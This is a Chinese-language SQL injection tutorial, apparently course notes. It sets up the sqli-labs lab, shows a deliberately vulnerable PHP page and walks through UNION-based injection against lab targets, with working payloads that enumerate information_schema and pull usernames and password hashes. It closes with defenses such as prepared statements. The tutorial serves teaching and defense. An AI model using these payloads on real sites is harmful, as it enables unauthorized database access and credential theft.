目录
前言
在本系列课程学习中,SQL注入漏洞将是重点部分,SQL注入非常复杂,区分各种数据库类型、提交方法、数据类型等注入,需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是Web安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
一.简易代码分析SQL注入原理
1. 理解Sql注入
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
如果web应用未对动态构造的sql语句使用的参数进行正确性审查(即便使用了参数化技术),攻击者就很可能会修改后台sql语句的构造。如果攻击者能够修改sql语句,那么该语句将与应用的用户具有相同的权限。当使用sql服务器执行与操作系统交互命令时,该进程将与执行命令的组件(如数据库服务器、应用服务器或web服务器)拥有相同的权限,这种权限的级别通常很高。如果攻击者执行以上恶意代码的插入操作成功,那么用户数据库服务器或者整个应用会遭到破坏,甚至被控制。
2. Sql注入的产生过程及常见原因
2.1 产生过程
大多数的web应用都需要与数据库进行交互,并且大多数web应用编程语言(如ASP、C##、.NET、Java和PHP)均提供了可编程的方法来与数据库连接并进行交互。如果web应用开发人员无法确保在将从web表单,cookie及输入参数等收到的值传递给sql查询(该查询在数据库服务器上执行)之前已经对其进行过验证,那么通常会出现sql注入漏洞,如果攻击者能够控制发送给sql查询的输入,并且能够操纵该输入将其解析为代码而非数据,那么攻击者就很有可能有能力在后台数据库执行该代码。
2.2 常见的sql注入产生原因
SQL注入的产生原因通常表现在以下几方面:
- 转义字符处理不合适:Sql数据库将单引号字符(’)解析成代码与数据间的分界线:单引号外面的内容军事需要运行的代码,而用单引号引起来的内容均是数据。只需要简单的在URL或WEB页面的字段中输入一个单引号,就能快速识别出Web站点是否会受到Sql注入攻击。
- 不安全的数据库配置:数据库带有很多默认的用户预安装内容。SQL Server使用声名狼藉的“sa”作为数据库系统管理员账户,MySQL使用“root”和“anonymous”用户账户,Oracle则在创建数据库时通常会创建SYS、SYSTEM、DBSNMP和OUTLN账户。这些并非是全部的账号,只是比较出名的账户中的一部分,还有很多其他的账户。其他账户同样按默认方式进行预设,口令众所周知。这带来了很大的安全风险,攻击者利用sql注入漏洞时,通常会尝试访问数据库的元数据,如内部的数据库、表名称、列数据类型、访问权限,例如MySQL服务器的元数据位于information_schema虚拟数据库中,可通过show databases; 和show tables; 命令访问。所有的MySQL用户均有权限访问该数据库中的表,但只能查看表中那些与该用户访问权限相对应的对象的行。
- 不合理的查询集处理:有时需要使用动态的sql语句对某些复杂的应用进行编码,因为程序开发阶段可能还不知道要查询的表或字段(或者尚不存在)。比如一些需要与大型数据库进行交互的应用,这类数据库在定期创建的表中的数据由于应用已经产生了输入,因而开发人员会信任该数据,攻击者可以使用自己的表和字段数据来替换应用产生的值,从而影响系统的返回值。
- 不当的错误处理:错误处理不当会为web站点带来很多安全方面的问题。最常见的问题是将详细的内部错误消息(如错误代码,数据库转存储)显示给用户或攻击。这些错误消息会泄露实现细节,为攻击者提供与网站潜在缺陷相关的重要线索。
- 多个提交处理不当:大型的Web开发项目容易出现这样的问题:某些开发人员会对输入进行验证,而某些开发人员则不以为然。对于开发人员团队,甚至公司来说,彼此独立工作的情形并不少见,很难保证项目中每个人都遵循相同的标准。应用开发人员还倾向于围绕用户来设计应用,他们尽可能的使用预期的处理流程来引导用户,认为用户将遵循他们已经设计好的逻辑顺序。例如:当用户已到达一系列表单中的第三个表单时,他们会期望用户肯定已经完成第一个和第二个表达。但实际上,借助URL乱序来请求资源,能够非常容易的避开预期的数据流程。
二. Sqlilabs注入靶场搭建及使用
GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.
docker pull acgpiano/sqli-labs docker run -dt --name sqli -p 80:80 -p 13306:3306 --rm acgpiano/sqli-labs docker exec -it sqli /bin/bash
访问127.0.0.1,点击 Setup/reset Databases for Lab 初始化数据库。
以 127.0.0.1/Less2 为例。其PHP代码如下:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-2 **Error Based- Intiger**</title> </head> <body bgcolor="#000000"> <div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br> <font size="3" color="#FFFF00"> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; // 第1步:接受数据 //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; // 第2步:拼接数据 $result=mysql_query($sql); // 第3步:把语句进行数据库执行 $row = mysql_fetch_array($result); // 第4步:把执行结果进行展示 if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value"; } ?> </font> </div></br></br></br><center> <img src="../images/Less-2.jpg" /></center> </body> </html>
四个步骤:获取数据,拼接数据,执行语句,显示结果
访问 127.0.0.1/Less-2/index.php?id=1 显示:
代码中执行的语句是 SELECT * FROM users WHERE id=$id LIMIT 0,1
mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | challenges | | mysql | | performance_schema | | security | +--------------------+ 5 rows in set (0.00 sec) mysql> use security; Database changed mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails | | referers | | uagents | | users | +--------------------+ 4 rows in set (0.00 sec) mysql> select * from users where id=1 limit 0,1; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=2 limit 0,1; +----+----------+------------+ | id | username | password | +----+----------+------------+ | 2 | Angelina | I-kill-you | +----+----------+------------+ 1 row in set (0.00 sec) mysql> select * from users where id=-2 union select 1,email_id,3 from emails limit 0,1; +----+------------------+----------+ | id | username | password | +----+------------------+----------+ | 1 | Dumb@dhakkan.com | 3 | +----+------------------+----------+ 1 row in set (0.01 sec)
访问 http://127.0.0.1:8080/salilabs/Less-2/index.php?id=2
执行 SELECT *FROM users WHERE id=2 LIMIT 0,1
访问 http://127.0.0.1:8080/sqlilabs/Iess-2/index.php?id=-2
执行 SELECT *FROM users WHERE id=-2 LIMIT 0,1
访问 http://127.0.0.1:8080/salilabs/Iess-2/index.php?id=-2 union select 1,email_id,3 from emails
执行 SELECT *FROM users WHERE id=-2 union select 1,email_id,3 from emails LIMIT 0,1在参数后拼接恶意的Sql语句,使其执行,这就获取到了其他表里的其他信息。有时可以跨表获取到敏感信息诸如管理员账密。
前面的语句执行错误(查询为空)才会执行后面拼接的语句。所以经常传递负数参数id=-1或1=1,然后进行拼接。
之所以会出现这个注入点,是因为代码中直接传递的变量$id代入sql语句中执行,没有做任何的限制,为恶意代码插入执行创造了条件。通过修改带入的代码执行的语句最终达到SQL注入获取敏感信息。
$id=$_GET['id']; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql);
可控变量、代入数据库查询,且不存在变量过滤或过滤不严谨。
可能存在注入点的域名:
www.xiaodi8.com/index.php?id=8 www.xiaodi8.com/?id=10 // 同理访问 www.xiaodi8.com/index.php?id=10 www.xiaodi8.com/?id=10&x=1 www.xiaodi8.com/index.php // 可能存在post注入 在地址上看不出来
参数x有注入,以下哪些注入测试正确?(BC)
A.www.xiaodi8.com/news.php?y=1 and 1=1&x=2 B.www.xiaodi8.com/news.php?y=1&x=2 and 1=1 C.www.xiaodi8.com/news.php?y=l and 1=l&x=2 and 1=1 D.www.xiaodi8.com/news.php?xx=l and 1=1&xxx=2 and 1=1
A.注入语句and 1=1写到y后面了。D. 参数名都不对,xx、xxx
and是数据库连接符,&是URL参数连接符。URL中&是连接不同参数的间隔符,and是数据库的与关系,对前面查询的语句进行追加限定作用。
三. 墨者靶场真实Mysql注入演示
判断是否存在注入点:
1、老方法 逻辑值 and 1 = 1 页面正常 and 1 = 2 页面异常 则可能存在注入点 SELECTFROM users WHERE id=1 LIMIT 0,1 SELECT * FROM users WHERE id=l and 1=1 LIMIT 0,1 正常 SELECT * FROM users WHERE id=l and 1=2 LIMIT 0,1 错误 SELECT * FROM users WHERE id=1 真 1=1 真 1=2 假 真且真=真 真且假=假 2、order by 通过order by 猜列数 判断注入的字段数 order by 5 时页面出错说明一共4列 通过id=-2 and 1=222 union select 1,2,3,4查看页面报错 前面的查询执行结果为假即可
为什么要猜列数?因为要判断注入的字段数,猜解字段数是为了注入时保持一致,union联合查询字段数必须一样,否则会报错。
第一条查询(id=-2)无结果,后一条结果(union select 1,2,3,4)就会显示,select 1,2,3,4 类似四条管道,判断前端通过那条管道输出,直接替换表名列名就能把后端数据输出出来。
首先 order by 查询了有几列数据,然后 union select 看哪几列数据可以显示出来,然后将能显示的替换成注入语句就可以了。
信息收集:
数据库版本:version() 5.7.22-0ubuntu0.16.04.1 数据库名字:database() mozhe_Discuz_StormGroup 数据库用户:user() root@localhost 操作系统:@@version_compile_os Linux
探测版本的意义:
Mysql5.0 及以上的版本存在一个 information_schema 数据库,存储记录所有的数据库名、表名、列名,可以通过这个数据库获取数据库下面的表名和列名。
没有 information_schema 时只能靠猜。搞版本可以借助 information_schema 进行有根据的查询。
数据库中'.'符号意味着下一级,A.B意味着A数据库下的B表。
获取相关数据:
information_schema.tables # information_schema 下所有表名 information_schema.columns # information_schema 下所有列名 table_name # 表名 column_name # 列名 table_schema # 数据库名
id=-2 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查询指定数据库 'mozhe_Discuz_StormGroup' 下的表名信息:
id=-2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
两个表。查询指定表 'StormGroup_member' 下的列名信息:
id=-2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
显示name,password:
id=-2 union select 1,name,group_concat(password),4 from StormGroup_member where name='mozhe' id=-2 union select 1,name,password,4 from StormGroup_member limit 1,1
md5解密得到mozhe的密码。登陆即进入网站后台。
如果存在多个数据采用 limit x,1 进行猜测尝试。
如何防御SQL漏洞?
核心原则:数据代码分离原则。
1.最佳方法:预编译语句,绑定变量。使用预编译的SQL语句,SQL的语意不会变化,攻击者无法改变SQL的结构,即使攻击者插入了类似于’or ‘1’=’1的字符串,也只会将此字符串作为username查询。
2.从存储过程来防御:先将SQL语句定义在数据库中,存储过程中可能也存在注入问题,应该尽量避免在存储过程中使用动态SQL语句。
3.从数据类型角度来防御:限制数据类型,并统一数据格式。
4.从开发者角度来防御:开发时尽量用安全函数代替不安全函数,编写安全代码。危险函数,常见的执行命令函数,动态访问函数,如C语言中的system(),PHP的eval(),JSP的include()导致的代码越权执行,都是注入。
5.从数据库管理者角度来防御:的最小权限原则,避免root,dbowner等高权限用户直接连接数据库。